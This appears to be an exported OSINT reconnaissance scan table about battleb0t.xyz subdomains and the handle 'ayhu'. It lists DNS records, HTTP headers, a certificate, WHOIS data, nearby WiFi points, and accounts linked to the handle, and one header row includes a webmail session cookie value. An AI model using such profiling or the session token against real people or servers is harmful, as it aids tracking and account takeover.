| Date Found | Type | Risky Data Type | Module | Children | Correlations | Distance | Starred | Annotation | Data | Source Data |
|---|---|---|---|---|---|---|---|---|---|---|
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 16 | 0 | 1 | 0 | None | 2a06:98c1:3121::1 | ayhu.xyz |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.95 | 165.232.113.85 |
| 2023-05-12 02:55:01 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:28:39.865Z", "ip": "188.114.96.1", "location_updated_at": "2023-04-29T20:40:06.346917Z", "autonomous_system_updated_at": "2023-04-29T20:40:06.346970Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "noitafile-proxy.zuibaqi.com": {"record_type": "A", "resolved_at": "2023-05-09T16:21:18.328899036Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "www.test4-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-25T12:35:31.168490324Z"}, "ssl4.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-02-02T00:27:29.175252329Z"}, "pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "939394.xyz": {"record_type": "A", "resolved_at": "2023-03-24T21:43:29.035929030Z"}, "api.939394.cn": {"record_type": "A", "resolved_at": "2022-12-30T12:33:15.088861766Z"}, "finalsfootyfantasy.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:32.701218324Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "enter.agpsdo.edu.ru": {"record_type": "A", "resolved_at": "2023-04-13T20:07:14.050231893Z"}, "paradshop.ir": {"record_type": "A", "resolved_at": "2022-11-18T14:16:06.009427234Z"}, "test4-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-28T12:30:46.414407007Z"}, "abcbourse.ir": {"record_type": "A", "resolved_at": "2022-10-25T15:12:33.856179812Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2023-03-30T19:32:04.069794297Z"}, 
"ssl.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-30T15:42:14.364581488Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-24T14:59:01.147426415Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "karriere-job-booster.at": {"record_type": "A", "resolved_at": "2023-04-12T21:48:57.147456694Z"}, "odenneszolaca.cf": {"record_type": "A", "resolved_at": "2023-02-17T02:27:33.470439994Z"}, "karriere-job-booster.com": {"record_type": "A", "resolved_at": "2023-04-22T14:40:02.799652037Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2023-05-01T20:11:56.835607536Z"}, "ssl5.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-19T12:26:12.193299619Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "metako.kz": {"record_type": "A", "resolved_at": "2023-04-26T19:09:17.996870996Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "www.13709394.net": {"record_type": "A", "resolved_at": "2023-04-25T18:56:56.576355949Z"}, "www.test6-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-03-17T12:46:14.887012316Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-26T15:24:28.844795223Z"}, "dornikasafir.de": {"record_type": "A", "resolved_at": "2022-10-02T14:08:30.967547568Z"}, "www.fakherturkman.com": {"record_type": "A", "resolved_at": "2022-11-07T13:24:27.903118674Z"}, "www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "www.test5-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-12-25T12:33:32.915967721Z"}, "password.moeking.me": {"record_type": "A", "resolved_at": "2022-09-25T16:38:19.046997106Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": 
"2022-10-30T17:30:49.591604261Z"}, "fi.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-05-01T14:32:55.216085423Z"}, "www.133335.xyz": {"record_type": "A", "resolved_at": "2022-09-25T19:02:08.754559807Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "moeking.me": {"record_type": "A", "resolved_at": "2022-09-30T15:32:44.686639976Z"}, "download.8t.cx": {"record_type": "A", "resolved_at": "2023-02-24T17:37:07.782880370Z"}, "test2-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.852803846Z"}, "133335.xyz": {"record_type": "A", "resolved_at": "2022-10-05T17:45:47.967622672Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-04-18T20:54:02.995698546Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "sub.133335.xyz": {"record_type": "A", "resolved_at": "2022-10-03T20:37:50.410080500Z"}, "web3rh.tk": {"record_type": "A", "resolved_at": "2023-02-20T04:15:37.204816270Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2023-01-11T15:16:43.150193914Z"}, "ses.co.ir": {"record_type": "A", "resolved_at": "2022-10-03T15:24:37.474565747Z"}, "test1-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-12-05T12:32:16.018654402Z"}, "www.tootanro.com": {"record_type": "A", "resolved_at": "2022-10-24T14:06:17.503873544Z"}, "www.metako.kz": {"record_type": "A", "resolved_at": "2023-05-05T17:41:02.011446152Z"}, "nordjyskgraesslaaning.dk": {"record_type": "A", "resolved_at": "2023-01-19T00:51:09.365049648Z"}, "33t.life": {"record_type": "A", "resolved_at": "2022-12-15T15:20:29.852611959Z"}, "app.myhealthpointe.no": {"record_type": "A", "resolved_at": "2022-10-01T15:32:46.256381743Z"}, "www.939394.xyz": {"record_type": "A", "resolved_at": "2023-03-04T19:54:36.565190153Z"}, "oscord.net": {"record_type": "A", "resolved_at": 
"2023-05-07T20:04:57.891682634Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2023-04-28T14:34:55.423339504Z"}, "agpsdo.edu.ru": {"record_type": "A", "resolved_at": "2023-04-26T22:14:12.681023418Z"}, "www.ostrovok.net": {"record_type": "A", "resolved_at": "2023-05-07T20:05:01.309575808Z"}, "test6-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-29T12:35:27.340588919Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2023-01-21T13:35:04.083346865Z"}, "mytampered.golf": {"record_type": "A", "resolved_at": "2022-12-22T14:42:39.165034528Z"}, "www.test1-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.811643407Z"}, "assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "athletichouseacademic.com": {"record_type": "A", "resolved_at": "2023-04-18T11:24:30.935186784Z"}, "www.rbtradinggroup.com": {"record_type": "A", "resolved_at": "2022-10-24T13:49:09.818009144Z"}, "hola.organizoo.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:38.886997403Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2023-04-20T12:15:33.428852719Z"}, "xnllarblack.art": {"record_type": "A", "resolved_at": "2023-04-21T20:37:36.441653637Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "oytunjivillage.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:58.523823601Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2023-04-10T16:35:40.386710867Z"}, "panel.moeking.me": {"record_type": "A", "resolved_at": "2022-09-28T16:39:39.161526355Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "www.bobo8090.com": {"record_type": "A", "resolved_at": 
"2023-02-10T13:15:31.285424987Z"}, "persaldo-treuhand.ch": {"record_type": "A", "resolved_at": "2023-01-07T12:29:30.392242949Z"}, "pic.939394.cn": {"record_type": "A", "resolved_at": "2022-12-31T12:38:06.391476974Z"}, "www.otherend.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:39.580563012Z"}, "clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-05-07T21:19:52.237134340Z"}, "e-management.lv": {"record_type": "A", "resolved_at": "2023-05-10T17:58:43.673701872Z"}, "bezi386.xyz": {"record_type": "A", "resolved_at": "2023-03-16T01:18:53.784985236Z"}, "inthemachine.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:39.481058126Z"}, "www.athletichouseacademic.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T13:49:15.422177239Z"}, "sign.moeking.me": {"record_type": "A", "resolved_at": "2022-09-28T16:39:39.465293148Z"}, "www.abcbourse.ir": {"record_type": "A", "resolved_at": "2022-10-20T15:09:44.156091370Z"}, "ftp.netrobotic.ir": {"record_type": "A", "resolved_at": "2023-04-04T18:41:04.300955582Z"}, "de.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-04-28T15:19:37.298278045Z"}, "test5-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2023-01-11T12:32:24.608221922Z"}, "diacounneirepuhar.ml": {"record_type": "A", "resolved_at": "2023-02-18T02:32:50.074200205Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "www.test2-pointg.nc-testdomain2.club": {"record_type": "A", "resolved_at": "2022-11-27T12:26:47.902936535Z"}}, "names": ["wolny.poker", "athletichouseacademic.com", "e-management.lv", "www.test4-pointg.nc-testdomain2.club", "noitafile-proxy.zuibaqi.com", "www.clinic.tanyar.org", "megafrica.ao", "sub.133335.xyz", "www.test6-pointg.nc-testdomain2.club", "demo.jamalghamari.com", "enter.agpsdo.edu.ru", "www.13709394.net", "mytampered.golf", "total-ev-charge.com", 
"dl.jamalghamari.com", "inthemachine.com.au", "lt.makingprojec.com", "www.wolny.poker", "barbecue-masters.dk", "app.myhealthpointe.no", "ses.co.ir", "beautybeyondhair.buzz", "ssl5.nc-testdomain2.club", "www.shop.charkhak.ir", "www.metako.kz", "bezi386.xyz", "barbecuemasters.dk", "nordjyskgraesslaaning.dk", "www.133335.xyz", "test1-pointg.nc-testdomain2.club", "133335.xyz", "ap | 188.114.96.1 |
| 2023-05-12 03:33:52 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif 8Photoshop 3.0 mntrRGB XYZ acspAPPL | https://funny.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Playstation Network (Category: gaming)
https://psnprofiles.com/xhr/search/users?q=ayshoo | ayshoo |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.23): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000justin000.github.io]
https://www.openphish.com/feed.txt | 000justin000.github.io |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Powered_By": "DISPLAY_UTF8", "Keep_Alive": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Link": "DISPLAY_UTF8", "Alt_Svc": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "X_Powered_By": ["PHP/7.4.33"], "Keep_Alive": ["timeout=5, max=100"], "Vary": ["Accept-Encoding"], "Server": ["LiteSpeed"], "Connection": ["Keep-Alive"], "Link": ["<https://acilacikveteriner.com/wp-json/>; rel=\"https://api.w.org/\""], "Alt_Svc": ["h3=\":443\"; ma=2592000, h3-29=\":443\"; ma=2592000, h3-Q050=\":443\"; ma=2592000, h3-Q046=\":443\"; ma=2592000, h3-Q043=\":443\"; ma=2592000, quic=\":443\"; ma=2592000; v=\"43,46\""], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"]} | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:04:BB:BC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H06PCVJ4HBKTDMM1V2TTSTEZ"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:10:04 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | cloudflare.com | cdnjs.cloudflare.com |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/ayhu/ | ayhu |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/gallery.css | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PP2104 (Net ID: 00:19:CB:7B:6C:D7) | 40.2024, 29.0398 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "webmailsession=%3ai7RZ7smCZHbrrA3k%2cc6f59b16b1db3e998a7645b6e2984b9e; HttpOnly; path=/; port=2095", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2095", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095", "roundcube_cookies=enabled; HttpOnly; expires=Fri, 10-May-2024 13:43:03 GMT; path=/; port=2095"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1C:17:B0) | 52.3759, 4.8975 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KNOLBEHEER (Net ID: 00:01:24:F0:5F:22) | 52.3759, 4.8975 |
| 2023-05-12 02:50:29 | Physical Address | No | GLEIF | 1 | 0 | 3 | 0 | None | 2155 E. GoDaddy Way, Tempe, US-AZ, US, 85284 | Go Daddy, LLC |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/reveloder.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 207.154.228.169 |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 66.170.74.34.bc.googleusercontent.com | 34.74.170.66 |
| 2023-05-12 02:44:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | netlify.app | netlify.app |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c57adae9fbb90f2-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:34:02 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx | https://funny.battleb0t.xyz/images/kappi_1.png |
| 2023-05-12 02:53:56 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::/48 | 2606:50c0:8001::153 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:05.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:6A:5D:4C:DD:33:BA:F4:6D:06:CD:62:8E:
62:A6:29:12:73:7E:C4:39:CD:7D:CB:4D:69:0D:6B:E6:
45:D1:49:BA:02:20:62:DC:B1:D6:60:8B:66:25:C3:6B:
92:41:2D:6B:D9:09:69:75:B3:D8:0A:B3:0D:7C:54:94:
66:20:F5:CC:6B:CE
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 10:44:05.107 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:1E:C1:82:64:68:53:D0:B4:02:DB:
57:9B:B5:22:1E:9E:35:DC:46:F1:4F:28:01:0D:8C:E2:
45:59:C5:A9:E3:02:21:00:96:C6:99:D6:12:DF:9E:19:
D7:CD:44:66:3D:89:58:9B:65:51:7C:84:99:4A:C9:3C:
8B:FE:37:A8:47:DE:C3:56
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:09:16 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 3 | 0 | None | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | nom-nom.link |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.200): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | reflektions (Net ID: 00:01:38:8D:E0:8C) | 37.7642, -122.3993 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | 001viet.com |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:2053 | 188.114.96.0/24 |
